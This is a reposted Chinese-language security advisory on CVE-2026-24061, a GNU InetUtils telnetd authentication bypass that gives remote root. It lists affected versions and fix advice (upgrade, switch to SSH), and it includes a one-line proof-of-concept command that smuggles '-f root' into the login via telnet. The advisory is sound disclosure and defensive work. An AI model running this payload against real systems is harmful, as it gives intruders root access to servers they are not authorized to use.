文章总结: 本文披露了GNUInetUtilstelnetd远程认证绕过漏洞CVE-2026-24061。该漏洞影响1.9.3至2.7版本,允许攻击者无需密码直接获取root权限,CVSS评分为9.8,危害极高。文中给出了具体的POC验证命令及受影响的系统范围,并指出主流发行版默认存在风险。修复建议明确为升级至2.7以上版本或使用SSH替代Telnet。鉴于漏洞利用简单且后果严重,建议相关人员尽快采取防护措施。 综合评分: 81 文章分类: 漏洞分析,漏洞POC,漏洞预警
【漏洞复现】CVE-2026-24061 直接拿root权限!GNU InetUtils telnetd远程认证绕过漏洞!
DeareX DeareX
破浪信安
2026年1月22日 12:41 四川
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞简介
GNU InetUtils telnetd 是 GNU InetUtils 套件中的远程登录服务守护进程,2026年1月互联网披露 GNU InetUtils telnetd 远程认证绕过漏洞(CVE-2026-24061),该漏洞允许远程攻击者绕过 telnetd 的身份验证机制,直接获取root权限,可导致服务器失陷。
| | | | | | — | — | — | — | | 漏洞概述 | | | | | 漏洞名称 | GNU InetUtils telnetd远程认证绕过漏洞 | | | | 漏洞编号 | CVE-2026-24061 | | | | 披露时间 | 2026-01-21 | POC状态 | 已公开 | | 漏洞类型 | 认证绕过 | EXP状态 | 已公开 | | | 利用可能性 | 高 | 技术细节状态 | 已公开 | | CVSS 3.1 | 9.8 | 在野利用状态 | 未知 |
影响版本
1.9.3 <= GNU InetUtils telnetd <= 2.7
漏洞复现
poc:
U***='-f root' telnet -a IP
影响及修复建议
影响
多个主流发行版在执行 apt install telnetd时默认安装受影响版本,部分Linux相关系统包括嵌入式设备可能同样集成telnetd组件存在影响 。
修复建议
- 将 GNU InetUtils telnetd 升级到 2.7 以上版本
- 建议使用 ssh 代替 telnetd。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:破浪信安 DeareX DeareX《【漏洞复现】CVE-2026-24061 直接拿root权限!GNU InetUtils telnetd远程认证绕过漏洞!》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。








评论